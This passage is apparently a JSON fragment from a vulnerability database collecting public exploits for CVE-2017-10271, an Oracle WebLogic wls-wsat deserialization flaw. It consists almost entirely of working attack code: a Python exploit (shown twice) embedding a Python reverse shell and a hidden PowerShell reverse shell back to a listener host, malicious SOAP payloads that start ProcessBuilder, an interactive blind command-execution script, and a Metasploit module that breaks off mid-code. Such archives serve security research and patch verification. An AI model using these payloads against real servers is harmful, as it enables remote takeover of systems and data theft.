1;if \"\n r\"($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());while($os.Peek() -ne\"\n r\" -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};$s.Write($e.\"\n r\"GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};\"\n )\n 
self.cmd_payload = escape(self.cmd_payload)\n\n def cmd_base(self):\n if self.target == 'win':\n return 'cmd'\n return '/bin/sh'\n\n def cmd_opt(self):\n if self.target == 'win':\n return '/c'\n return '-c'\n\n\n def get_generic_check_payload(self):\n random_uri = ''.join(\n choice(ascii_uppercase + ascii_lowercase + digits)\n for _ in range(16))\n generic_check_payload = '''<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java version=\"1.8\" class=\"java.beans.XMLDecoder\">\n <object id=\"url\" class=\"java.net.URL\">\n <string>http://{lhost}:{lport}/{random_uri}</string>\n </object>\n <object idref=\"url\">\n <void id=\"stream\" method = \"openStream\" />\n </object>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>\n'''\n\n return generic_check_payload.format(\n lhost=self.lhost, lport=self.lport, random_uri=random_uri)\n\n def get_process_builder_payload(self):\n process_builder_payload = '''<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java>\n <object class=\"java.lang.ProcessBuilder\">\n <array class=\"java.lang.String\" length=\"3\" >\n <void index=\"0\">\n <string>{cmd_base}</string>\n </void>\n <void index=\"1\">\n <string>{cmd_opt}</string>\n </void>\n <void index=\"2\">\n <string>{cmd_payload}</string>\n </void>\n </array>\n <void method=\"start\"/>\n </object>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>\n'''\n return process_builder_payload.format(cmd_base=self.cmd_base(), cmd_opt=self.cmd_opt(),\n cmd_payload=self.cmd_payload)\n\n def print_banner(self):\n print(\"=\" * 80)\n print(\"CVE-2017-10271 RCE Exploit\")\n print(\"written by: Kevin Kirsche (d3c3pt10n)\")\n print(\"Remote Target: 
{rhost}\".format(rhost=self.url))\n print(\"Shell Listener: {lhost}:{lport}\".format(\n lhost=self.lhost, lport=self.lport))\n print(\"=\" * 80)\n\n def post_exploit(self, data):\n headers = {\n \"Content-Type\":\n \"text/xml;charset=UTF-8\",\n \"User-Agent\":\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36\"\n }\n payload = \"/wls-wsat/CoordinatorPortType\"\n\n vulnurl = self.url + payload\n try:\n req = post(\n vulnurl, data=data, headers=headers, timeout=10, verify=False)\n if self.check:\n print(\"[*] Did you get an HTTP GET request back?\")\n else:\n print(\"[*] Did you get a shell back?\")\n except Exception as e:\n print('[!] Connection Error')\n print(e)\n\n def run(self):\n self.print_banner()\n if self.check:\n print('[+] Generating generic check payload')\n payload = self.get_generic_check_payload()\n else:\n print('[+] Generating execution payload')\n payload = self.get_process_builder_payload()\n print('[*] Generated:')\n print(payload)\n if self.check:\n print('[+] Running generic check payload')\n else:\n print('[+] Running {target} execute payload').format(target=self.target)\n\n self.post_exploit(data=payload)\n\n\nif __name__ == \"__main__\":\n parser = ArgumentParser(\n description=\n 'CVE-2017-10271 Oracle WebLogic Server WLS Security exploit. 
Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.'\n )\n parser.add_argument(\n '-l',\n '--lhost',\n required=True,\n dest='lhost',\n nargs='?',\n help='The listening host that the remote server should connect back to')\n parser.add_argument(\n '-p',\n '--lport',\n required=True,\n dest='lport',\n nargs='?',\n help='The listening port that the remote server should connect back to')\n parser.add_argument(\n '-r',\n '--rhost',\n required=True,\n dest='rhost',\n nargs='?',\n help='The remote host base URL that we should send the exploit to')\n parser.add_argument(\n '-c',\n '--check',\n dest='check',\n action='store_true',\n help=\n 'Execute a check using HTTP to see if the host is vulnerable. This will cause the host to issue an HTTP request. This is a generic check.'\n )\n parser.add_argument(\n '-w',\n '--win',\n dest='windows',\n action='store_true',\n help=\n 'Use the windows cmd payload instead of unix payload (execute mode only).'\n )\n\n args = parser.parse_args()\n\n exploit = Exploit(\n check=args.check, rhost=args.rhost, lhost=args.lhost, lport=args.lport,\n windows=args.windows)\n exploit.run()", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "packetstorm": [{"lastseen": "2018-01-29T00:20:57", "description": "", "published": "2018-01-28T00:00:00", "type": "packetstorm", "title": "Oracle WebLogic wls-wsat Component Deserialization Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-10271"], "modified": "2018-01-28T00:00:00", "id": "PACKETSTORM:146143", "href": "https://packetstormsecurity.com/files/146143/Oracle-WebLogic-wls-wsat-Component-Deserialization-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n# include 
Msf::Exploit::Remote::HttpServer \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Oracle WebLogic wls-wsat Component Deserialization RCE', \n'Description' => %q( \nThe Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization \nremote code execution vulnerability. Supported versions that are affected are \n10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin \nof ERPScan and Federico Dotta of Media Service. Please note that SRVHOST, SRVPORT, \nHTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check \nand will not be used when executing the exploit itself. \n), \n'License' => MSF_LICENSE, \n'Author' => [ \n'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>', # Metasploit module \n'Luffin', # Proof of Concept \n'Alexey Tyurin', 'Federico Dotta' # Vulnerability Discovery \n], \n'References' => \n[ \n['URL', 'https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html'], # Security Bulletin \n['URL', 'https://github.com/Luffin/CVE-2017-10271'], # Proof-of-Concept \n['URL', 'https://github.com/kkirsche/CVE-2017-10271'], # Standalone Exploit \n['CVE', '2017-10271'], \n['EDB', '43458'] \n], \n'Platform' => %w{ win unix }, \n'Arch' => [ ARCH_CMD ], \n'Targets' => \n[ \n[ 'Windows Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'win' } ], \n[ 'Unix Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ] \n], \n'DisclosureDate' => \"Oct 19 2017\", \n# Note that this is by index, rather than name. It's generally easiest \n# just to put the default at the beginning of the list and skip this \n# entirely. 
\n'DefaultTarget' => 0 \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']), \nOptPort.new('RPORT', [true, \"The remote port that the WebLogic WSAT endpoint listens on\", 7001]), \nOptFloat.new('TIMEOUT', [true, \"The timeout value of requests to RHOST\", 20.0]), \n# OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the check payload', 10]) \n]) \nend \n \ndef cmd_base \nif target['Platform'] == 'win' \nreturn 'cmd' \nelse \nreturn '/bin/sh' \nend \nend \n \ndef cmd_opt \nif target['Platform'] == 'win' \nreturn '/c' \nelse \nreturn '-c' \nend \nend \n \n \n# \n# This generates a XML payload that will execute the desired payload on the RHOST \n# \ndef exploit_process_builder_payload \n# Generate a payload which will execute on a *nix machine using /bin/sh \nxml = %Q{<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<soapenv:Header> \n<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> \n<java> \n<void class=\"java.lang.ProcessBuilder\"> \n<array class=\"java.lang.String\" length=\"3\" > \n<void index=\"0\"> \n<string>#{cmd_base}</string> \n</void> \n<void index=\"1\"> \n<string>#{cmd_opt}</string> \n</void> \n<void index=\"2\"> \n<string>#{payload.encoded.encode(xml: :text)}</string> \n</void> \n</array> \n<void method=\"start\"/> \n</void> \n</java> \n</work:WorkContext> \n</soapenv:Header> \n<soapenv:Body/> \n</soapenv:Envelope>} \nend \n \n# \n# This builds a XML payload that will generate a HTTP GET request to our SRVHOST \n# from the target machine. 
\n# \ndef check_process_builder_payload \nxml = %Q{<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<soapenv:Header> \n<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> \n<java version=\"1.8\" class=\"java.beans.XMLDecoder\"> \n<void id=\"url\" class=\"java.net.URL\"> \n<string>#{get_uri.encode(xml: :text)}</string> \n</void> \n<void idref=\"url\"> \n<void id=\"stream\" method = \"openStream\" /> \n</void> \n</java> \n</work:WorkContext> \n</soapenv:Header> \n<soapenv:Body/> \n</soapenv:Envelope>} \nend \n \n# \n# In the event that a 'check' host responds, we should respond randomly so that we don't clog up \n# the logs too much with a no response error or similar. \n# \ndef on_request_uri(cli, request) \nrandom_content = '<html><head></head><body><p>'+Rex::Text.rand_text_alphanumeric(20)+'<p></body></html>' \nsend_response(cli, random_content) \n \n@received_request = true \nend \n \n# \n# The exploit method connects to the remote service and sends a randomly generated string \n# encapsulated within a SOAP XML body. This will start an HTTP server for us to receive \n# the response from. 
This is based off of the exploit technique from \n# exploits/windows/novell/netiq_pum_eval.rb \n# \n# This doesn't work as is because MSF cannot mix HttpServer and HttpClient \n# at the time of authoring this \n# \n# def check \n# start_service \n# \n# print_status('Sending the check payload...') \n# res = send_request_cgi({ \n# 'method' => 'POST', \n# 'uri' => normalize_uri(target_uri.path), \n# 'data' => check_process_builder_payload, \n# 'ctype' => 'text/xml;charset=UTF-8' \n# }, datastore['TIMEOUT']) \n# \n# print_status(\"Waiting #{datastore['HTTP_DELAY']} seconds to see if the target requests our URI...\") \n# \n# waited = 0 \n# until @received_request \n# sleep 1 \n# waited += 1 \n# if waited > datastore['HTTP_DELAY'] \n# stop_service \n# return Exploit::CheckCode::Safe \n# end \n# end \n# \n# stop_service \n# return Exploit::CheckCode::Vulnerable \n# end \n \n# \n# The exploit method connects to the remote service and sends the specified payload \n# encapsulated within a SOAP XML body. \n# \ndef exploit \nsend_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path), \n'data' => exploit_process_builder_payload, \n'ctype' => 'text/xml;charset=UTF-8' \n}, datastore['TIMEOUT']) \nend \nend \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/146143/oracle_weblogic_wsat_deserialization_rce.rb.txt"}], "exploitdb": [{"lastseen": "2018-01-24T14:18:38", "description": "Oracle WebLogic < 10.3.6 - 'wls-wsat' Component Deserialisation Remote Command Execution. CVE-2017-10271. 
Remote exploit for Multiple platform", "published": "2018-01-03T00:00:00", "type": "exploitdb", "title": "Oracle WebLogic < 10.3.6 - 'wls-wsat' Component Deserialisation Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-10271"], "modified": "2018-01-03T00:00:00", "id": "EDB-ID:43458", "href": "https://www.exploit-db.com/exploits/43458/", "sourceData": "#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# Exploit Title: Weblogic wls-wsat Component Deserialization RCE\r\n# Date Authored: Jan 3, 2018\r\n# Date Announced: 10/19/2017\r\n# Exploit Author: Kevin Kirsche (d3c3pt10n)\r\n# Exploit Github: https://github.com/kkirsche/CVE-2017-10271\r\n# Exploit is based off of POC by Luffin from Github\r\n# https://github.com/Luffin/CVE-2017-10271\r\n# Vendor Homepage: http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html\r\n# Version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0\r\n# Tested on: Oracle WebLogic 10.3.6.0.0 running on Oracle Linux 6.8 and Ubuntu 14.04.4 LTS\r\n# CVE: CVE-2017-10271\r\n# Usage: python exploit.py -l 10.10.10.10 -p 4444 -r http://will.bepwned.com:7001/\r\n# (Python 3) Example check listener: python3 -m http.server 4444\r\n# (Python 2) Example check listener: python -m SimpleHTTPServer 4444\r\n# (Netcat) Example exploit listener: nc -nlvp 4444\r\n\r\nfrom sys import exit\r\nfrom requests import post\r\nfrom argparse import ArgumentParser\r\nfrom random import choice\r\nfrom string import ascii_uppercase, ascii_lowercase, digits\r\nfrom xml.sax.saxutils import escape\r\n\r\nclass Exploit:\r\n\r\n def __init__(self, check, rhost, lhost, lport, windows):\r\n self.url = rhost if not rhost.endswith('/') else rhost.strip('/')\r\n self.lhost = lhost\r\n self.lport = lport\r\n self.check = check\r\n if windows:\r\n self.target = 'win'\r\n else:\r\n self.target = 'unix'\r\n\r\n if self.target == 'unix':\r\n # Unix reverse shell\r\n # You should also be able to instead use something from MSFVenom. 
E.g.\r\n # msfvenom -p cmd/unix/reverse_python LHOST=10.10.10.10 LPORT=4444\r\n self.cmd_payload = (\r\n \"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.\"\r\n \"SOCK_STREAM);s.connect((\\\"{lhost}\\\",{lport}));os.dup2(s.fileno(),0); os.dup2(\"\r\n \"s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);'\"\r\n ).format(lhost=self.lhost, lport=self.lport)\r\n else:\r\n # Windows reverse shell\r\n # Based on msfvenom -p cmd/windows/reverse_powershell LHOST=10.10.10.10 LPORT=4444\r\n self.cmd_payload = (\r\n r\"powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) \"\r\n r\"{$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='\" + self.lhost +\"\"\r\n r\"';$p='\"+ self.lport + \"';$c=New-Object system.net.sockets.tcpclient;$c.connect($a\"\r\n r\",$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;\"\r\n r\"$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';\"\r\n r\"$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;\"\r\n r\"$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;\"\r\n r\"$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;\"\r\n r\"while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};\"\r\n r\"$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;\"\r\n r\"while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1; while (($i -gt 0)\"\r\n r\" -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);$pos+=$r;\"\r\n r\"if (-not $pos -or $pos -eq 0) {RSC};if ($nb[0..$($pos-1)] -contains 10) {break}};\"\r\n r\"if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 1;if \"\r\n r\"($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());while($os.Peek() -ne\"\r\n r\" -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};$s.Write($e.\"\r\n r\"GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};\"\r\n )\r\n 
self.cmd_payload = escape(self.cmd_payload)\r\n\r\n def cmd_base(self):\r\n if self.target == 'win':\r\n return 'cmd'\r\n return '/bin/sh'\r\n\r\n def cmd_opt(self):\r\n if self.target == 'win':\r\n return '/c'\r\n return '-c'\r\n\r\n\r\n def get_generic_check_payload(self):\r\n random_uri = ''.join(\r\n choice(ascii_uppercase + ascii_lowercase + digits)\r\n for _ in range(16))\r\n generic_check_payload = '''<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soapenv:Header>\r\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\r\n <java version=\"1.8\" class=\"java.beans.XMLDecoder\">\r\n <object id=\"url\" class=\"java.net.URL\">\r\n <string>http://{lhost}:{lport}/{random_uri}</string>\r\n </object>\r\n <object idref=\"url\">\r\n <void id=\"stream\" method = \"openStream\" />\r\n </object>\r\n </java>\r\n </work:WorkContext>\r\n </soapenv:Header>\r\n <soapenv:Body/>\r\n</soapenv:Envelope>\r\n'''\r\n\r\n return generic_check_payload.format(\r\n lhost=self.lhost, lport=self.lport, random_uri=random_uri)\r\n\r\n def get_process_builder_payload(self):\r\n process_builder_payload = '''<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soapenv:Header>\r\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\r\n <java>\r\n <object class=\"java.lang.ProcessBuilder\">\r\n <array class=\"java.lang.String\" length=\"3\" >\r\n <void index=\"0\">\r\n <string>{cmd_base}</string>\r\n </void>\r\n <void index=\"1\">\r\n <string>{cmd_opt}</string>\r\n </void>\r\n <void index=\"2\">\r\n <string>{cmd_payload}</string>\r\n </void>\r\n </array>\r\n <void method=\"start\"/>\r\n </object>\r\n </java>\r\n </work:WorkContext>\r\n </soapenv:Header>\r\n <soapenv:Body/>\r\n</soapenv:Envelope>\r\n'''\r\n return process_builder_payload.format(cmd_base=self.cmd_base(), cmd_opt=self.cmd_opt(),\r\n cmd_payload=self.cmd_payload)\r\n\r\n def print_banner(self):\r\n print(\"=\" * 80)\r\n 
print(\"CVE-2017-10271 RCE Exploit\")\r\n print(\"written by: Kevin Kirsche (d3c3pt10n)\")\r\n print(\"Remote Target: {rhost}\".format(rhost=self.url))\r\n print(\"Shell Listener: {lhost}:{lport}\".format(\r\n lhost=self.lhost, lport=self.lport))\r\n print(\"=\" * 80)\r\n\r\n def post_exploit(self, data):\r\n headers = {\r\n \"Content-Type\":\r\n \"text/xml;charset=UTF-8\",\r\n \"User-Agent\":\r\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36\"\r\n }\r\n payload = \"/wls-wsat/CoordinatorPortType\"\r\n\r\n vulnurl = self.url + payload\r\n try:\r\n req = post(\r\n vulnurl, data=data, headers=headers, timeout=10, verify=False)\r\n if self.check:\r\n print(\"[*] Did you get an HTTP GET request back?\")\r\n else:\r\n print(\"[*] Did you get a shell back?\")\r\n except Exception as e:\r\n print('[!] Connection Error')\r\n print(e)\r\n\r\n def run(self):\r\n self.print_banner()\r\n if self.check:\r\n print('[+] Generating generic check payload')\r\n payload = self.get_generic_check_payload()\r\n else:\r\n print('[+] Generating execution payload')\r\n payload = self.get_process_builder_payload()\r\n print('[*] Generated:')\r\n print(payload)\r\n if self.check:\r\n print('[+] Running generic check payload')\r\n else:\r\n print('[+] Running {target} execute payload').format(target=self.target)\r\n\r\n self.post_exploit(data=payload)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n parser = ArgumentParser(\r\n description=\r\n 'CVE-2017-10271 Oracle WebLogic Server WLS Security exploit. 
Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.'\r\n )\r\n parser.add_argument(\r\n '-l',\r\n '--lhost',\r\n required=True,\r\n dest='lhost',\r\n nargs='?',\r\n help='The listening host that the remote server should connect back to')\r\n parser.add_argument(\r\n '-p',\r\n '--lport',\r\n required=True,\r\n dest='lport',\r\n nargs='?',\r\n help='The listening port that the remote server should connect back to')\r\n parser.add_argument(\r\n '-r',\r\n '--rhost',\r\n required=True,\r\n dest='rhost',\r\n nargs='?',\r\n help='The remote host base URL that we should send the exploit to')\r\n parser.add_argument(\r\n '-c',\r\n '--check',\r\n dest='check',\r\n action='store_true',\r\n help=\r\n 'Execute a check using HTTP to see if the host is vulnerable. This will cause the host to issue an HTTP request. This is a generic check.'\r\n )\r\n parser.add_argument(\r\n '-w',\r\n '--win',\r\n dest='windows',\r\n action='store_true',\r\n help=\r\n 'Use the windows cmd payload instead of unix payload (execute mode only).'\r\n )\r\n\r\n args = parser.parse_args()\r\n\r\n exploit = Exploit(\r\n check=args.check, rhost=args.rhost, lhost=args.lhost, lport=args.lport,\r\n windows=args.windows)\r\n exploit.run()", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/43458/"}, {"lastseen": "2018-11-30T12:32:29", "description": "", "published": "2017-12-26T00:00:00", "type": "exploitdb", "title": "Oracle WebLogic Server 10.3.6.0.0 / 12.x - Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-10271"], "modified": "2017-12-26T00:00:00", "id": "EDB-ID:43392", "href": "https://www.exploit-db.com/exploits/43392", "sourceData": "import requests\r\nimport sys\r\n\r\nurl_in = sys.argv[1]\r\npayload_url = url_in + \"/wls-wsat/CoordinatorPortType\"\r\npayload_header = {'content-type': 'text/xml'}\r\n\r\n\r\ndef payload_command (command_in):\r\n 
html_escape_table = {\r\n \"&\": \"&\",\r\n '\"': \"\"\",\r\n \"'\": \"'\",\r\n \">\": \">\",\r\n \"<\": \"<\",\r\n }\r\n command_filtered = \"<string>\"+\"\".join(html_escape_table.get(c, c) for c in command_in)+\"</string>\"\r\n payload_1 = \"<soapenv:Envelope xmlns:soapenv=\\\"http://schemas.xmlsoap.org/soap/envelope/\\\"> \\n\" \\\r\n \" <soapenv:Header> \" \\\r\n \" <work:WorkContext xmlns:work=\\\"http://bea.com/2004/06/soap/workarea/\\\"> \\n\" \\\r\n \" <java version=\\\"1.8.0_151\\\" class=\\\"java.beans.XMLDecoder\\\"> \\n\" \\\r\n \" <void class=\\\"java.lang.ProcessBuilder\\\"> \\n\" \\\r\n \" <array class=\\\"java.lang.String\\\" length=\\\"3\\\">\" \\\r\n \" <void index = \\\"0\\\"> \" \\\r\n \" <string>cmd</string> \" \\\r\n \" </void> \" \\\r\n \" <void index = \\\"1\\\"> \" \\\r\n \" <string>/c</string> \" \\\r\n \" </void> \" \\\r\n \" <void index = \\\"2\\\"> \" \\\r\n + command_filtered + \\\r\n \" </void> \" \\\r\n \" </array>\" \\\r\n \" <void method=\\\"start\\\"/>\" \\\r\n \" </void>\" \\\r\n \" </java>\" \\\r\n \" </work:WorkContext>\" \\\r\n \" </soapenv:Header>\" \\\r\n \" <soapenv:Body/>\" \\\r\n \"</soapenv:Envelope>\"\r\n return payload_1\r\n\r\ndef do_post(command_in):\r\n result = requests.post(payload_url, payload_command(command_in ),headers = payload_header)\r\n\r\n if result.status_code == 500:\r\n print \"Command Executed \\n\"\r\n else:\r\n print \"Something Went Wrong \\n\"\r\n\r\n\r\n\r\nprint \"***************************************************** \\n\" \\\r\n \"**************** Coded By 1337g ****************** \\n\" \\\r\n \"* CVE-2017-10271 Blind Remote Command Execute EXP * \\n\" \\\r\n \"***************************************************** \\n\"\r\n\r\nwhile 1:\r\n command_in = raw_input(\"Eneter your command here: \")\r\n if command_in == \"exit\" : exit(0)\r\n do_post(command_in)", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": 
"https://www.exploit-db.com/download/43392"}], "metasploit": [{"lastseen": "2020-10-14T07:49:01", "description": "The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization remote code execution vulnerability. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin of ERPScan and Federico Dotta of Media Service. Please note that SRVHOST, SRVPORT, HTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check and will not be used when executing the exploit itself.\n", "published": "2018-01-05T20:05:21", "type": "metasploit", "title": "Oracle WebLogic wls-wsat Component Deserialization RCE", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-10271"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/HTTP/ORACLE_WEBLOGIC_WSAT_DESERIALIZATION_RCE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n # include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Oracle WebLogic wls-wsat Component Deserialization RCE',\n 'Description' => %q(\n The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization\n remote code execution vulnerability. Supported versions that are affected are\n 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin\n of ERPScan and Federico Dotta of Media Service. 
Please note that SRVHOST, SRVPORT,\n HTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check\n and will not be used when executing the exploit itself.\n ),\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>', # Metasploit module\n 'Luffin', # Proof of Concept\n 'Alexey Tyurin', 'Federico Dotta' # Vulnerability Discovery\n ],\n 'References' =>\n [\n ['URL', 'https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html'], # Security Bulletin\n ['URL', 'https://github.com/Luffin/CVE-2017-10271'], # Proof-of-Concept\n ['URL', 'https://github.com/kkirsche/CVE-2017-10271'], # Standalone Exploit\n ['CVE', '2017-10271'],\n ['EDB', '43458']\n ],\n 'Platform' => %w{ win unix },\n 'Arch' => [ ARCH_CMD ],\n 'Targets' =>\n [\n [ 'Windows Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'win' } ],\n [ 'Unix Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ]\n ],\n 'DisclosureDate' => '2017-10-19',\n # Note that this is by index, rather than name. 
It's generally easiest\n # just to put the default at the beginning of the list and skip this\n # entirely.\n 'DefaultTarget' => 0\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']),\n OptPort.new('RPORT', [true, \"The remote port that the WebLogic WSAT endpoint listens on\", 7001]),\n OptFloat.new('TIMEOUT', [true, \"The timeout value of requests to RHOST\", 20.0]),\n # OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the check payload', 10])\n ])\n end\n\n def cmd_base\n if target['Platform'] == 'win'\n return 'cmd'\n else\n return '/bin/sh'\n end\n end\n\n def cmd_opt\n if target['Platform'] == 'win'\n return '/c'\n else\n return '-c'\n end\n end\n\n\n #\n # This generates a XML payload that will execute the desired payload on the RHOST\n #\n def exploit_process_builder_payload\n # Generate a payload which will execute on a *nix machine using /bin/sh\n xml = %Q{<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java>\n <void class=\"java.lang.ProcessBuilder\">\n <array class=\"java.lang.String\" length=\"3\" >\n <void index=\"0\">\n <string>#{cmd_base}</string>\n </void>\n <void index=\"1\">\n <string>#{cmd_opt}</string>\n </void>\n <void index=\"2\">\n <string>#{payload.encoded.encode(xml: :text)}</string>\n </void>\n </array>\n <void method=\"start\"/>\n </void>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>}\n end\n\n #\n # This builds a XML payload that will generate a HTTP GET request to our SRVHOST\n # from the target machine.\n #\n def check_process_builder_payload\n xml = %Q{<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java version=\"1.8\" 
class=\"java.beans.XMLDecoder\">\n <void id=\"url\" class=\"java.net.URL\">\n <string>#{get_uri.encode(xml: :text)}</string>\n </void>\n <void idref=\"url\">\n <void id=\"stream\" method = \"openStream\" />\n </void>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>}\n end\n\n #\n # In the event that a 'check' host responds, we should respond randomly so that we don't clog up\n # the logs too much with a no response error or similar.\n #\n def on_request_uri(cli, request)\n random_content = '<html><head></head><body><p>'+Rex::Text.rand_text_alphanumeric(20)+'<p></body></html>'\n send_response(cli, random_content)\n\n @received_request = true\n end\n\n #\n # The exploit method connects to the remote service and sends a randomly generated string\n # encapsulated within a SOAP XML body. This will start an HTTP server for us to receive\n # the response from. This is based off of the exploit technique from\n # exploits/windows/novell/netiq_pum_eval.rb\n #\n # This doesn't work as is because MSF cannot mix HttpServer and HttpClient\n # at the time of authoring this\n #\n # def check\n # start_service\n #\n # print_status('Sending the check payload...')\n # res = send_request_cgi({\n # 'method' => 'POST',\n # 'uri' => normalize_uri(target_uri.path),\n # 'data' => check_process_builder_payload,\n # 'ctype' => 'text/xml;charset=UTF-8'\n # }, datastore['TIMEOUT'])\n #\n # print_status(\"Waiting #{datastore['HTTP_DELAY']} seconds to see if the target requests our URI...\")\n #\n # waited = 0\n # until @received_request\n # sleep 1\n # waited += 1\n # if waited > datastore['HTTP_DELAY']\n # stop_service\n # return 